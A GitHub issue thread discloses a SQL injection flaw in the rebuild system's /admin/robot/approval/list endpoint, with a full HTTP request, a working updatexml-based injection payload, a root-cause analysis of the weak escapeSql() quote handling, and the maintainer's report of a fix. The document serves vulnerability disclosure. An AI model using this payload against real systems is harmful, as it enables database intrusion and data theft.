### ISSUE TITLE
There is a SQL injection vulnerability in the/admin/robot/approval/list interface of the rebuild system

### ISSUE THREAD

**Issue by Mechoy** [getrebuild/rebuild#594]
### 版本 / Version
<=3.2.3

### 什么问题 / What's the problem
在rebuild系统的/admin/robot/approval/list接口中存在SQL注入漏洞 
There is a SQL injection vulnerability in the/admin/robot/approval/list interface of the rebuild system.

#### 功能点 / Function points
![sql1_5](https://user-images.githubusercontent.com/97539349/225795720-fb10bb38-ed78-45e2-a554-8b4f25dec5f8.png)
#### 搜索功能的请求报文 / Request message for search function
```
GET /admin/robot/approval/list?entity=&q=1&_=1678979432278 HTTP/1.1
Host: 192.168.0.102:18080
X-AuthToken: 
Accept: */*
X-CsrfToken: 
X-Requested-With: XMLHttpRequest
X-Client: RB/WEB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: text/plain;charset=utf-8
Referer: http://192.168.0.102:18080/admin/robot/approvals
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.113967341.1678976466; rb.TourEnd=session; JSESSIONID=78BDF749546E83FB68398994E888984E; _ga_CC8EXS9BLD=GS1.1.1678979231.2.1.1678979433.0.0.0
Connection: close
```
#### 攻击载荷 / payload
`%25%5c%27%20or%20updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=0x72656275696c64+limit+0,1),0x7e),1)--+`

#### 漏洞复现 / Vulnerability recurrence
![sql1_6](https://user-images.githubusercontent.com/97539349/225796517-478b9774-7d19-499e-8033-ff20a4647703.png)

### 系统环境 (操作系统/MySQL版本/浏览器等) / System environment (OS/MySQL/Browser etc)
Mysql 5.7.26 
Windows 
JDK1.8.0_341
Chrome

### 说明  / Suggested description
sql injection vulnerability exists in rebuild <=3.2.3
在rebuild系统小于3.2.3版本中存在SQL注入漏洞
Failed to legally check parameters, resulting in SQL injection vulnerabilities.
未能合法检查参数从而导致sql注入漏洞.

#### 漏洞类型 / Vulnerability Type
SQLi

#### 产品供应商  / Vendor of Product
https://github.com/getrebuild/rebuild

#### 受影响的产品代码库 / Affected Product Code Base
<=3.2.3

#### 受影响组件 / Affected Component
/admin/robot/approval/list

#### 攻击方式 / Attack Type
Remote

### 漏洞成因 / Cause of vulnerability
Interface:/admin/robot/approval/list
In the `com.build.web.robot.approval.ApprovalAdminController#approvalList()` method, the SQL statement is created and passed into the `queryListOfConfig()` method. 
在com.rebuild.web.robot.approval.ApprovalAdminController#approvalList方法中，SQL语句被创建，并传入queryListOfConfig()方法。
![sql1_1](https://user-images.githubusercontent.com/97539349/225796769-224640fb-7898-41a4-91ee-a13bc078683b.png)
In the `com.rebuild.web.admin.ConfigCommons#queryListOfConfig()` method, replace the user's incoming data into the SQL statement, and call the `escapeSql()` method to process the user's input data.
在com.rebuild.web.admin.ConfigCommons#queryListOfConfig()方法中，将用户传入数据替换至SQL语句中，此时调用escapeSql()方法对用户的输入数据进行处理
![sql1_2](https://user-images.githubusercontent.com/97539349/225796837-08b36aab-4d52-410e-8d51-f55c1ec8b1f6.png)
In the `escapeSql()` method, replace one single quotation mark in user input with two single quotation marks.
escapeSql()方法中，将用户输入中的一个单引号替换为两个单引号
![sql1_3](https://user-images.githubusercontent.com/97539349/225796950-3ecc1fa7-1a02-40c0-833f-c6a476718e42.png)
Attackers can escape redundant quotes to achieve SQL injection
攻击者可以通过转义的方式将多余的引号处理掉，从而实现SQL注入
Then directly call `createQuery()` to query
随后直接调用createQuery()进行查询
![sql1_4](https://user-images.githubusercontent.com/97539349/225797085-5b1ab7e7-a26a-4d0f-82e4-fda131ed3975.png)
The end,thanks!

**Comment by getrebuild** [comment]
We are fixed

**Comment by Mechoy** [comment]
Thank you for your quick response and fixing the issue!
